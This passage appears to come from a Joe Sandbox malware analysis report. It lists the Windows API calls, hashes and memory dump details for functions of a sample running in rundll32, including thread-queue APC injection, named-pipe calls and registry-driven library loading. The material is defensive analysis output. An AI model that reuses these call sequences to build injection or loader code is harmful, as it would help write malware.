                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,0557A045,00000000,00000094,00000001,00000000,00000094,00000000,?,05571A31,00000000,00000000), ref: 055735D3
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                                                          • String ID:
                                                          • API String ID: 3873609385-0
                                                          • Opcode ID: 8cfabcebf6f2246e8977d46e8211339c803ca9d448931fcb30fa761fd5c7977f
                                                          • Instruction ID: 3ed98bb8f17d9f36662f2edd32d5d290d425b5f6b3a61290094b6d27c96d6105
                                                          • Opcode Fuzzy Hash: 8cfabcebf6f2246e8977d46e8211339c803ca9d448931fcb30fa761fd5c7977f
                                                          • Instruction Fuzzy Hash: A711D571215118AFE2206B25BC8EE7B3F5CFB412BAB020526F906D2140DE291D0CA6B0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05588E8B, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • StrChrA.SHLWAPI(00000000,0000002C,7748D3B0,00000000,00000000,05572A10), ref: 05588EBC
                                                          • StrChrA.SHLWAPI(00000001,0000002C), ref: 05588ECF
                                                          • StrTrimA.SHLWAPI(00000000,?), ref: 05588EF2
                                                          • StrTrimA.SHLWAPI(00000001,?), ref: 05588F01
                                                          • lstrlen.KERNEL32(00000000), ref: 05588F36
                                                          • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 05588F49
                                                          • lstrcpy.KERNEL32(00000004,00000000), ref: 05588F67
                                                          • HeapFree.KERNEL32(00000000,00000000,00000001,00000000,-00000005,00000001), ref: 05588F8B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                                                          • String ID: W
                                                          • API String ID: 1974185407-655174618
                                                          • Opcode ID: d70da7ea453637018f6735a83c453f855ee35bb4c37558f4a6192c56c99f5d17
                                                          • Instruction ID: cb46f12a60e8dbc66813ba4a524313507226a394a52e07b3a08db83f9c242461
                                                          • Opcode Fuzzy Hash: d70da7ea453637018f6735a83c453f855ee35bb4c37558f4a6192c56c99f5d17
                                                          • Instruction Fuzzy Hash: 9931C071924216EFDB10EFA5DC4AEAE7FBAFF08700F054416F405A7240EB78A905DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05590D24, Relevance: 15.3, APIs: 10, Instructions: 279memorythreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 05590D9B
                                                          • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 05590DBA
                                                            • Part of subcall function 05592C06: wsprintfA.USER32 ref: 05592C19
                                                            • Part of subcall function 05592C06: CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 05592C2B
                                                            • Part of subcall function 05592C06: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 05592C55
                                                            • Part of subcall function 05592C06: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05592C68
                                                            • Part of subcall function 05592C06: CloseHandle.KERNEL32(?), ref: 05592C71
                                                          • GetLastError.KERNEL32 ref: 0559108D
                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 0559109D
                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 055910AE
                                                          • RtlExitUserThread.NTDLL(?), ref: 055910BC
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocCriticalSectionTimerVirtualWaitable$CloseCreateEnterErrorExitHandleLastLeaveMultipleObjectsThreadUserWaitwsprintf
                                                          • String ID:
                                                          • API String ID: 1258333524-0
                                                          • Opcode ID: 0b83c8d73ae847713ff1116d77f577a362b460c73d49fd881a64ee3b8db68bb7
                                                          • Instruction ID: f054213184a7fc8eacf446cbf3d3865d0242128565f13b8707b0f49fbbf955a6
                                                          • Opcode Fuzzy Hash: 0b83c8d73ae847713ff1116d77f577a362b460c73d49fd881a64ee3b8db68bb7
                                                          • Instruction Fuzzy Hash: 1BB16F7150465AEFEF248F21CC88EAA7BBAFF08305F104569F556D21A0EB3AE944DF10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05571C05, Relevance: 15.2, APIs: 10, Instructions: 186stringmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(059BB060), ref: 05571C28
                                                          • lstrlen.KERNEL32(?), ref: 05571C37
                                                          • lstrlen.KERNEL32(?), ref: 05571C44
                                                          • lstrlen.KERNEL32(00000000), ref: 05571C5C
                                                          • lstrlen.KERNEL32(?), ref: 05571C68
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05571C84
                                                          • wsprintfA.USER32 ref: 05571D66
                                                          • memcpy.NTDLL(00000000,?,?), ref: 05571DB3
                                                          • InterlockedExchange.KERNEL32(0559C0BC,00000000), ref: 05571DD1
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05571E12
                                                            • Part of subcall function 05576312: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0557633B
                                                            • Part of subcall function 05576312: memcpy.NTDLL(00000000,?,?), ref: 0557634E
                                                            • Part of subcall function 05576312: RtlEnterCriticalSection.NTDLL(0559C328), ref: 0557635F
                                                            • Part of subcall function 05576312: RtlLeaveCriticalSection.NTDLL(0559C328), ref: 05576374
                                                            • Part of subcall function 05576312: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 055763AC
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                                                          • String ID:
                                                          • API String ID: 4198405257-0
                                                          • Opcode ID: 489abfb5911ef41506be3a01f941bc9618b0208103f661121e0cac0465113fcd
                                                          • Instruction ID: 39e2072bd23e7a1c7d7c761645f3427a42991fef30eefce4e5522e4f387e0fe2
                                                          • Opcode Fuzzy Hash: 489abfb5911ef41506be3a01f941bc9618b0208103f661121e0cac0465113fcd
                                                          • Instruction Fuzzy Hash: 73617E71A1060AEFCF10DFA5EC85EAE7BB9FB04344F05456AF805A7200DB389A58DF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557BFCF, Relevance: 15.1, APIs: 10, Instructions: 94filememorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0557C361: memset.NTDLL ref: 0557C383
                                                            • Part of subcall function 0557C361: CloseHandle.KERNEL32(?,?,?,?,?), ref: 0557C42D
                                                          • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 0557C016
                                                          • CloseHandle.KERNEL32(?), ref: 0557C022
                                                          • PathFindFileNameW.SHLWAPI(?), ref: 0557C032
                                                          • lstrlenW.KERNEL32(00000000), ref: 0557C03C
                                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0557C04D
                                                          • wcstombs.NTDLL ref: 0557C05E
                                                          • lstrlen.KERNEL32(?), ref: 0557C06B
                                                          • UnmapViewOfFile.KERNEL32(?,?,?,?,00000001), ref: 0557C0A1
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0557C0B3
                                                          • DeleteFileW.KERNEL32(?), ref: 0557C0C1
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                                                          • String ID:
                                                          • API String ID: 2256351002-0
                                                          • Opcode ID: 93547667377de93c3110b9ab967e1a62b907706afff7a916a8b0e893caa454a6
                                                          • Instruction ID: 7064bcf808c0c44ab829337a2dc1f337c18c3312fd0972b13c47654fc94bc4e9
                                                          • Opcode Fuzzy Hash: 93547667377de93c3110b9ab967e1a62b907706afff7a916a8b0e893caa454a6
                                                          • Instruction Fuzzy Hash: F5315A7590011EEFCF219FA5E98A8AE7F79FF44355B01406AF902A2110DB359E58EFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558A0E5, Relevance: 15.1, APIs: 10, Instructions: 78stringfilememoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 0558A0F5
                                                          • CreateFileW.KERNEL32(05579E67,80000000,00000003,0559C1A8,00000003,00000000,00000000,?,05579E67,00000000,?,05571A31,00000000), ref: 0558A112
                                                          • GetLastError.KERNEL32(?,05579E67,00000000,?,05571A31,00000000), ref: 0558A1BA
                                                            • Part of subcall function 0558FA1F: lstrlen.KERNEL32(?,00000000,0558A13A,00000027,0559C1A8,?,00000000,?,?,0558A13A,?,00000001,?,05579E67,00000000,?), ref: 0558FA55
                                                            • Part of subcall function 0558FA1F: lstrcpy.KERNEL32(00000000,00000000), ref: 0558FA79
                                                            • Part of subcall function 0558FA1F: lstrcat.KERNEL32(00000000,00000000), ref: 0558FA81
                                                          • GetFileSize.KERNEL32(05579E67,00000000,?,00000001,?,05579E67,00000000,?,05571A31,00000000), ref: 0558A145
                                                          • CreateFileMappingA.KERNEL32(05579E67,0559C1A8,00000002,00000000,00000000,05579E67), ref: 0558A159
                                                          • lstrlen.KERNEL32(05579E67,?,05579E67,00000000,?,05571A31,00000000), ref: 0558A175
                                                          • lstrcpy.KERNEL32(?,05579E67), ref: 0558A185
                                                          • GetLastError.KERNEL32(?,05579E67,00000000,?,05571A31,00000000), ref: 0558A18D
                                                          • HeapFree.KERNEL32(00000000,05579E67,?,05579E67,00000000,?,05571A31,00000000), ref: 0558A1A0
                                                          • CloseHandle.KERNEL32(05579E67,?,00000001,?,05579E67), ref: 0558A1B2
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                                                          • String ID:
                                                          • API String ID: 194907169-0
                                                          • Opcode ID: 883bc8f8f0ba32d1b5481a4a955ee2a52f12f3ebf6bbd927a98d845a96c1529c
                                                          • Instruction ID: a2da5316398d7d65687632f4703e24999e400c057e6d6bdd123b16d3dade2813
                                                          • Opcode Fuzzy Hash: 883bc8f8f0ba32d1b5481a4a955ee2a52f12f3ebf6bbd927a98d845a96c1529c
                                                          • Instruction Fuzzy Hash: DD212170900208FFDB109FA5D8899ADBFB9FF04351F51846AF506E6250DB38AE48EF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05591E10, Relevance: 15.1, APIs: 10, Instructions: 68threadprocesslibraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 05591E36
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 05591E42
                                                          • GetModuleHandleA.KERNEL32(?,059B9732,00000000,?,00000000), ref: 05591E62
                                                          • GetProcAddress.KERNEL32(00000000), ref: 05591E69
                                                          • Thread32First.KERNEL32(?,0000001C), ref: 05591E79
                                                          • OpenThread.KERNEL32(001F03FF,00000000,?), ref: 05591E94
                                                          • QueueUserAPC.KERNEL32(00000001,00000000,00000000), ref: 05591EA5
                                                          • CloseHandle.KERNEL32(00000000), ref: 05591EAC
                                                          • Thread32Next.KERNEL32(?,0000001C), ref: 05591EB5
                                                          • CloseHandle.KERNEL32(?), ref: 05591EC1
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                                                          • String ID:
                                                          • API String ID: 2341152533-0
                                                          • Opcode ID: 00ec88ed4363461f178f527c4c1a1d3a7f39c1bc531ba500d8e59c6b96914be7
                                                          • Instruction ID: c8c6c82d036dbe158b6efea07f6cb97788f80fa77a4f2df9b7851eaff4329e3e
                                                          • Opcode Fuzzy Hash: 00ec88ed4363461f178f527c4c1a1d3a7f39c1bc531ba500d8e59c6b96914be7
                                                          • Instruction Fuzzy Hash: AC216D7290011DAFDF059FE0DC89DAE7F7EFB48295B01412AF601A6150DB399949EBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557BDFA, Relevance: 15.1, APIs: 10, Instructions: 59sleepsynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetEvent.KERNEL32(?,7519F560,05590797,?,?,0558BCB5), ref: 0557BE0F
                                                            • Part of subcall function 0557DB47: InterlockedExchange.KERNEL32(?,000000FF), ref: 0557DB4E
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,0000003C), ref: 0557BE2F
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000003C,?,?,0558BCB5), ref: 0557BE38
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000003C,?,?,0558BCB5), ref: 0557BE42
                                                          • RtlEnterCriticalSection.NTDLL(00000008), ref: 0557BE4A
                                                          • RtlLeaveCriticalSection.NTDLL(00000008), ref: 0557BE62
                                                          • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,0000003C,?,?,0558BCB5), ref: 0557BE71
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000003C,?,?,0558BCB5), ref: 0557BE7E
                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,0000003C,?,?,0558BCB5), ref: 0557BE89
                                                          • RtlDeleteCriticalSection.NTDLL(00000008), ref: 0557BE93
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 1408595562-0
                                                          • Opcode ID: b56c59d49cf5a8f36114e41afdf3005dc4f8b918461033e57e4b91792bfbead4
                                                          • Instruction ID: 3fa28a21fd12494022959133e44b2011b2b1df2af49264176141870154142c63
                                                          • Opcode Fuzzy Hash: b56c59d49cf5a8f36114e41afdf3005dc4f8b918461033e57e4b91792bfbead4
                                                          • Instruction Fuzzy Hash: 2D119E31200719DFCB20AF65FC4996BBBB9BF407207050916F69383210EB39F448DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055816DE, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 125memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(00000001,00000000,00000104,00000000,0557B62D,00000000,00000001,?,?,?), ref: 055816F5
                                                          • lstrlen.KERNEL32(?), ref: 05581705
                                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05581739
                                                          • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 05581764
                                                          • memcpy.NTDLL(00000000,?,?), ref: 05581783
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 055817E4
                                                          • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 05581806
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Allocatelstrlenmemcpy$Free
                                                          • String ID: W
                                                          • API String ID: 3204852930-655174618
                                                          • Opcode ID: e9d940e0b88066a054d67d137f19e643a4357bb66a1010542057eef814fc1624
                                                          • Instruction ID: 5d329b167dcd746ee768fc3d7c13ee777a3a2fbfc013dc06ff4d1cb7cc13db7d
                                                          • Opcode Fuzzy Hash: e9d940e0b88066a054d67d137f19e643a4357bb66a1010542057eef814fc1624
                                                          • Instruction Fuzzy Hash: 664158B1D0060AEFDF11EF95CC85ABE7BB9FF04244F14442AE905A7200E7319A59DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05581486, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89memorystringpipeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000000,00000000,75145520,?,?,?,0557D50C,0000001C,00000000,00000000), ref: 055814B6
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 055814CC
                                                          • memcpy.NTDLL(00000010,?,00000000,?,?,?,0557D50C,0000001C), ref: 05581502
                                                          • memcpy.NTDLL(00000010,00000000,0557D50C,?,?,?,0557D50C), ref: 0558151D
                                                          • CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 0558153B
                                                          • GetLastError.KERNEL32(?,?,?,0557D50C), ref: 05581545
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,0557D50C), ref: 05581568
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                                                          • String ID: (
                                                          • API String ID: 2237239663-3887548279
                                                          • Opcode ID: bff8272ad6fd0cb352fb1b7823fd031b95613a365d7e76a0b1ddff9edb71a710
                                                          • Instruction ID: cebcfc1445e90a9ac739faf3293a4f28d5378e3d251a7f4258c99f22c44dd263
                                                          • Opcode Fuzzy Hash: bff8272ad6fd0cb352fb1b7823fd031b95613a365d7e76a0b1ddff9edb71a710
                                                          • Instruction Fuzzy Hash: 1C31B432510609EFCB20DFA5D885AABBFB9FB44350F014426FD06E2210E6349A5DDFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558B466, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87registrylibraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 0558B481
                                                          • RegCloseKey.ADVAPI32(?), ref: 0558B539
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • LoadLibraryA.KERNEL32(00000000), ref: 0558B4CF
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0558B4E8
                                                          • GetLastError.KERNEL32 ref: 0558B507
                                                          • FreeLibrary.KERNEL32(00000000), ref: 0558B519
                                                          • GetLastError.KERNEL32 ref: 0558B521
                                                          Strings
                                                          • Software\Microsoft\WAB\DLLPath, xrefs: 0558B472
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                                                          • String ID: Software\Microsoft\WAB\DLLPath
                                                          • API String ID: 1628847533-3156921957
                                                          • Opcode ID: 008c5dec2dc631bbac8d0d9c40db1c91c6aa93e852f768dacf9514312f3b1921
                                                          • Instruction ID: 8b9f7d88144725cafe86ac159d16e262f8fbdf2497ef993c727e739b1e9afb66
                                                          • Opcode Fuzzy Hash: 008c5dec2dc631bbac8d0d9c40db1c91c6aa93e852f768dacf9514312f3b1921
                                                          • Instruction Fuzzy Hash: 7B218671900118FBCB21BBA5EC89CBEBF7DFB88760B150566F802B2110E7354E08DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557F784, Relevance: 13.7, APIs: 9, Instructions: 168memorythreadsleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL ref: 0557F7C5
                                                          • memset.NTDLL ref: 0557F7D9
                                                            • Part of subcall function 055750C7: RegQueryValueExA.KERNEL32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 055750FF
                                                            • Part of subcall function 055750C7: RtlAllocateHeap.NTDLL(00000000,?), ref: 05575113
                                                            • Part of subcall function 055750C7: RegQueryValueExA.ADVAPI32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 0557512D
                                                            • Part of subcall function 055750C7: RegCloseKey.ADVAPI32(00000000,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?,055729E6,00000000), ref: 05575157
                                                          • GetCurrentThreadId.KERNEL32 ref: 0557F866
                                                          • GetCurrentThread.KERNEL32 ref: 0557F879
                                                          • RtlEnterCriticalSection.NTDLL(059BB148), ref: 0557F920
                                                          • Sleep.KERNEL32(0000000A), ref: 0557F92A
                                                          • RtlLeaveCriticalSection.NTDLL(059BB148), ref: 0557F950
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0557F97E
                                                          • HeapFree.KERNEL32(00000000,00000018), ref: 0557F991
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                                                          • String ID:
                                                          • API String ID: 1146182784-0
                                                          • Opcode ID: c4422bbb4415c14a2cb2a8e164f68c15873cfa331edbfa1b9c5c51c5cb6f1cef
                                                          • Instruction ID: d4c69fbf638764264abbf7036fd63b607b030b804b8f2df64b4b9a085746fab2
                                                          • Opcode Fuzzy Hash: c4422bbb4415c14a2cb2a8e164f68c15873cfa331edbfa1b9c5c51c5cb6f1cef
                                                          • Instruction Fuzzy Hash: D95128B151834AAFD710DF65E88592BBBE9FB88244F41492EF485D3210EB34ED489B92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558D412, Relevance: 13.6, APIs: 9, Instructions: 130memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 05584045: RtlEnterCriticalSection.NTDLL(0559C328), ref: 0558404D
                                                            • Part of subcall function 05584045: RtlLeaveCriticalSection.NTDLL(0559C328), ref: 05584062
                                                            • Part of subcall function 05584045: InterlockedIncrement.KERNEL32(0000001C), ref: 0558407B
                                                          • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 0558D44F
                                                          • memset.NTDLL ref: 0558D460
                                                          • lstrcmpi.KERNEL32(?,?), ref: 0558D4A0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0558D4CC
                                                          • memcpy.NTDLL(00000000,?,?), ref: 0558D4E0
                                                          • memset.NTDLL ref: 0558D4ED
                                                          • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 0558D506
                                                          • memcpy.NTDLL(-00000005,?,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 0558D529
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0558D546
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                                                          • String ID:
                                                          • API String ID: 694413484-0
                                                          • Opcode ID: acc4a69b7015588793e85cfbce6f036759dda62568396807a274a386d779d4a3
                                                          • Instruction ID: cd5f7aac8cb95b8e454fb9af5ed2e6c6363a0b1dd65690b74aae4e076c581a83
                                                          • Opcode Fuzzy Hash: acc4a69b7015588793e85cfbce6f036759dda62568396807a274a386d779d4a3
                                                          • Instruction Fuzzy Hash: A141A271E00209EFDB10EFA4DC85AADBBF9FB44314F15402AE515B7290EB79AA489B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05588D49, Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000022,00000000,00000000,00000000), ref: 05588D60
                                                          • lstrlen.KERNEL32(?), ref: 05588D68
                                                          • lstrlen.KERNEL32(?), ref: 05588DD3
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05588DFE
                                                          • memcpy.NTDLL(00000000,00000002,?), ref: 05588E0F
                                                          • memcpy.NTDLL(00000000,?,?), ref: 05588E25
                                                          • memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 05588E37
                                                          • memcpy.NTDLL(00000000,055963D8,00000002,00000000,?,?,00000000,?,?), ref: 05588E4A
                                                          • memcpy.NTDLL(00000000,?,00000002), ref: 05588E5F
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpy$lstrlen$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 3386453358-0
                                                          • Opcode ID: eeeebc79597a298a93c1bf833a392ca30d5c51971034df0866b4f3927a171112
                                                          • Instruction ID: 48a76aa6166d22c30232fc3f5df882f42927e20a18b5a215693b0b3df1192eb0
                                                          • Opcode Fuzzy Hash: eeeebc79597a298a93c1bf833a392ca30d5c51971034df0866b4f3927a171112
                                                          • Instruction Fuzzy Hash: 68413D72E0021AEFCF10DFA4DC85AAEBBB9FF48354F144456E915B7201E731AA54DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557CA49, Relevance: 13.6, APIs: 9, Instructions: 109memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 05584045: RtlEnterCriticalSection.NTDLL(0559C328), ref: 0558404D
                                                            • Part of subcall function 05584045: RtlLeaveCriticalSection.NTDLL(0559C328), ref: 05584062
                                                            • Part of subcall function 05584045: InterlockedIncrement.KERNEL32(0000001C), ref: 0558407B
                                                          • RtlAllocateHeap.NTDLL(00000000,055784D3,00000000), ref: 0557CA9A
                                                          • lstrlen.KERNEL32(00000008,?,?,?,055784D3,00000000), ref: 0557CAA9
                                                          • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 0557CABB
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,055784D3,00000000), ref: 0557CACB
                                                          • memcpy.NTDLL(00000000,00000000,055784D3,?,?,?,055784D3,00000000), ref: 0557CADD
                                                          • lstrcpy.KERNEL32(00000020), ref: 0557CB0F
                                                          • RtlEnterCriticalSection.NTDLL(0559C328), ref: 0557CB1B
                                                          • RtlLeaveCriticalSection.NTDLL(0559C328), ref: 0557CB73
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3746371830-0
                                                          • Opcode ID: 26867a5db7fb26bd55ff401bc54666a3c11ca1d45132e14884b1504cde171446
                                                          • Instruction ID: 1ec2d921121af07c0ef87bd36b10a0378d3832dde12af19e97093d2bfbfecabb
                                                          • Opcode Fuzzy Hash: 26867a5db7fb26bd55ff401bc54666a3c11ca1d45132e14884b1504cde171446
                                                          • Instruction Fuzzy Hash: 914168B1510709EFCB21DF68E885B6ABFF4FB08351F11452AF80A97200DB39AD58DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557DB6F, Relevance: 13.6, APIs: 9, Instructions: 105memorystringCOMMON
